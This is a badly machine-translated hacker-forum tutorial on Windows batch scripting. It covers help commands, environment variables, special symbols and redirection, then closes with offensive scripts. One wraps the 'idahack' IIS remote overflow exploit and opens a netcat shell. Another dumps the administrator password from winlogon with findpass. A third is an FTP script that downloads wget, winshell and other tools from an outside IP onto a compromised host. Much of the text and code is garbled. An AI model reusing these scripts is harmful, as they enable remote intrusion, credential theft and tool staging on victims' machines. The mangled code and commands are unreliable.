Batch BAT strengthens
Hacker security net http://www.hacker81.net
I hope everyone wants to understand the BAT batch to see the strengthening, seeing the article I just published. I also think of the importance of BAT. Everyone knows, so I turn a chapter, the good thing in Dongdong is jointly improved. I also hope that everyone has a good idea to learn to strengthen. Batch BAT skills
Article Structure 1. Help information for all built-in commands 2. Concept of environment variables 3. Built-in special symbols (actual use of intermediate attention avoidance) 4. Simple batch file concept 5. Annex 1 TMP.TXT 6. Annex 2 Sample. bat
###########################> Help information for all built-in commands ###################################################### /? if /? echo /? goto /? for /? shift /? call /? other needs of common commands type /? find /? findstr /? copy /? ______________________________________________________________________ will output all of the above help to a file echo ver > TMP.TXT VER >> TMP.TXT ECHO CMD /? >> TMP.TXT CMD /? >> TMP.TXT Echo Rem /? >> TMP.TXT REM /? >> TMP.TXT ECHO IF /? >> TMP.TXT IF /? >> TMP.TXT ECHO GOTO /? >> TMP.TXT GOTO /? >> TMP.TXT Echo for /? >> TMP.TXT for /? >> TMP.TXT Echo Shift /?> > tmp.txt shift /? >> tmp.txt echo call /? >> tmp.txt echo type /? >> tmp.txt type /? >> TMP.TXT Echo Find /? >> Tmp.txt Find /? >> TMP.TXT Echo Findstr /? >> TMP.TXT FINDSTR /? >> TMP.TXT Echo Copy /? >> TMP.TXT COPY /? >> TMP.TXT TYPE TMP. TXT ______________________________________________________
######################################################################################################################################################################################################################################################################################################## ############# 2. Concept of environmental variable ############################ ######################################## _____________________________________________________ c: / Program files> set allusersprofile = c: / document. and Settings / All Users CommonProgramFiles = C: / Program Files / Common Files COMPUTERNAME = FIRST ComSpec = C: /WINNT/system32/cmd.exe NUMBER_OF_PROCESSORS = 1 OS = Windows_NT Os2LibPath = C: / WINNT / system32 / os2 / dll; Path = C: / WinNT / System32; C: / Winnt; C: / Winnt / System32 / Wbem Pathext = .com; .exe; .bat; .cmd; .vbs; .vbe; .js; .jse; .wsf; .WSH PROCESSOR_ARCHITECTURE = x86 PROCESSOR_IDENTIFIER = x86 Family 6 Model 6 Stepping 5, GenuineIntel PROCESSOR_LEVEL = 6 PROCESSOR_REVISION = 0605 ProgramFiles = C: / Program Files PROMPT = $ P $ G SystemDrive = C: SystemRoot = C: / WINNT TEMP = C: / WinNT / TEMP TMP = C: / Winnt / Temp UserProfile = C: / Document. And settings / default user windir = c: / winntpath: Indicates the search path of the executable. My suggestion is that you put your program COPY to the% WINDIR% / system32 /. This directory. Generally you can search. Syntax : Copy mychenxu.exe% windir% / system32 /. Using points (.) Easy to use the reference to environment variables (English mode, half angle) Dual quotation number% Windir% variable %% WINDIR %% quadratic variable reference. We are commonly used There are% Temp% temporary file directory% WINDIR% system directory% errorlevel% exit code
Output files into the temporary file directory. This makes it easy to clean up the current directory.
Parameters with spaces. You should learn to use dual quotes ("") to indicate such as the PORGRAM FILE folder operation C: /> DIR P * C: / directory 2000-09-02 11:47 2,164 pdos.def 1999 -01-03 00:47
Program Files 1 file 2,164 bytes 1 directory 1,505,997,824 available bytes
C: /> CD Pro * C: / Program FILES>
C: /> C: /> CD "Program Files" C: / Program Files>
######################################################################################################################################################################################################################################################################################################## ############# 3. Built-in special symbol (actually use the intermediate pay attention to avoid) #################################################################################################################################################################################################################################################################### ######################################################################################################################################################################################################################################################################################################## #### Microsoft inside the following characters cannot be used in the middle of the created file name to use Con Nul aux / / │ ││ && ^> <* you can use most the name space. If you use the special characters <,>, │, &, or ^, you must precede them with the escape character (^) or quotation marks. If you use quotation marks, they are included as part of the value because everything following the equal sign is taken as The value. Consider The Following Examples: (大意: either you use ^ as the leader characters. Or only use double quotes "" "To create the variable value new & name, type: set varname = new ^ & name
To create the variable value "new & name", TYPE: SET VARNAME = "New & Name"
THE AMPERSAND (│), AND PARENTHESES () Are Special Characters That Must Be Preceded by The Escape CHARACTER (^) Or Quotation Marks When You Pass the as arguments. Find
Pacific Rim
"
Del
Else Echo filename. Missing
> Create a file >> Add to a file back @ prefix character. Representation The Bank does not display in the CMD, you can use the Echo OFF to close the display ^ for special symbols (> <&) leader. The first only shows AAA Second Output File BBB Echo 123456 ^> AAA Echo 1231231> BBB () contains the command (Echo aa & echo bb), and the same default separator symbol like space. & USAGE: The first command & second command [& Article 3 Commands ...] can be performed with this method simultaneously, regardless of whether the command is executed DIR C: / *. EXE & DIR D: / *. EXE & DIR E: / *. EXE && USAGE: The first command && second command [&& third command ...] When you encounter an error, you will not execute the back command, if There has been no error, it has been executed all commands; ││ usage: 1 Commands ││ │ Code [││ Article 3 Commands ...] When you encounter the correct command, you will not execute the back command, If there is no correct command, all commands have been executed; common syntax formats IF [not] Errorlevel Number Command Para1 Para2 if [not] string1 == String2 Command Para1 Para2 if [not] EXIST FileName Command Para1 Para2
IF exist filename command para1 para2 if not exist filename command para1 para2 IF "% 1" == "" goto end if "% 1" == "net" goto net if not "% 2" == "net" goto Other IF Errorlevel 1 Command Para1 Para2 if Not Errorlevel 1 Command Para1 Para2 FOR / L %% I in (Start, Step, End) Do Command [Command-parameters] %% I for / f "eol =; tokens = 2,3 * delims =, "% i in (myfile.txt) do Echo% I% J% k According to the alphabetical order ijklmnopq. EOL = C - refers to the end of a linear note character (one) Skip = n - refers to the file start The number of rows ignored when it is ignored. Delims = xxx - Indicator jacket set. This default separator set replaces the space and the jumping.
######################################################################################################################################################################################################################################################################################################## ############# 4. Simple Batch File Concept ################################################################################################################################################################################################################################################################################### ######################################################################
Echo this is test> a.txt Type a.txt echo this is test 1111 >> a.txt Type a.txt echo this is test 22222> a.txt type a.txt second echo is additional third ECHO Clear A.TXT Recreation A.txt
netstat -n │ find "3389" This will list all of the user's ip connection 3389. ________________ test.bat ___________________________________________________ @echo please care echo plese care 1111 echo plese care 2222 echo plese care 3333 @echo please care @echo plese care 1111 @echo Plese Care 2222 @echo discount statement does not display a comment statement, the Bank displays @REM does not display the comment statement, the Bank does not display @IF EXIST% Windir% / System32 / Find.exe (Echo Find Find.exe !!!) Else (Echo Error: NOT Find Find.exe) @if Exist% WINDIR% / System32 / Fina.exe (Echo Find Fina.exe !!!) Else (Echo Error: Not FIND FINA.exe) Let's take a specific one idahack ida remote overflow program is an example should be very simple ___________________ida.bat_______________________@rem ver 1.0 @if NOT exist% windir% / system32 / idahack.exe echo.. "ERROR: dont find idahack.exe" @if NOT exist% WINDIR% / system32 / nc.exe echo "error: dont find nc.exe" @IF "% 1" == "" goto usage @if NOT "% 2" == "" GOTO SP2
: Start @echo now start ... @Ping% 1 @echo chinese win2k: 1 sp1: 2 sp2: 3 idahack.exe% 1 80 1 99>% temp% / _ tmp @echo "prog exit code [% errorle%] Idahack.exe "@Type% Temp% / _ TMP @find" good luck "% temp% / _ tmp @echo" prog exit code [% errorle%] Find [Goog Luck] @if Not Errorlevel 1 nc.exe% 1 99 @goto end
: Sp2 @ iDahack.exe% 1 80% 2 99% temp% / _ tmp @Type% temp% / _ tmp @find "good luck"% temp% / _ TMP @if Not Errorlevel 1 nc.exe% 1 99 @goto End
: Usage @echo example: ida.bat ip @echo example: ida.bat ip (2, 3)
:. END _____________________ ida.bat__END _________________________________ Here we come back the second file is the administrator's password to get most people say not actually own not enter the correct information ___________________________fpass.bat____________________________________________@rem ver 1.0 @if NOT exist% windir... % / System32 / Findpass.exe Echo "Error: DONT FIND FINDPASS.EXE" @if NOT% WINDIR% / System32 / Pulist.exe Echo "Error: DONT FIND PULIST.EXE"
@echo ____________________________________________ @%%% 1%%%% 1 1 1 1 1 1%%%%% 1% 1 1 1 2 1 1 1 1 %] Findpass.exe "@Type% Temp% / _Findpass.txt @echo ________________________________________________________________________________★★★★★★ @ipconfig / All >>% TEMP% / _Findpass.txt @goto End
: USAGE @ Pulist.exe>% Temp% / _ Pass.txt @ FindStr.exe / i "Winlogon Explorer INTERNAT"% Temp% / _ pass.txt @echo "Example: fpass.bat% 1% 2% 3% 4 !! ! "@echo" usage: Findpass.exe DomainName Username Pid-of-Winlogon "
: END @echo "fpass.bat% COMPUTERNAME%% USERNAME% administrator" @echo "! Fpass.bat end [% errorlevel%]" _________________ fpass.bat ___ END___________________________________________________________ there is already a landed via telnet a remote host how to upload files (. WIN) Enter the following thing in turn. Of course, you can copy .ctrl V in the past. Then wait!!
Echo open 210.64.x.4 3396> W echo read >> W echo read >> W echo cd winnt >> w echo binary >> w echo pwd >> w echo get wget.exe >> W echo get winshell.exe> > w echo get any.exe >> w echo quit >> w ftp -s: w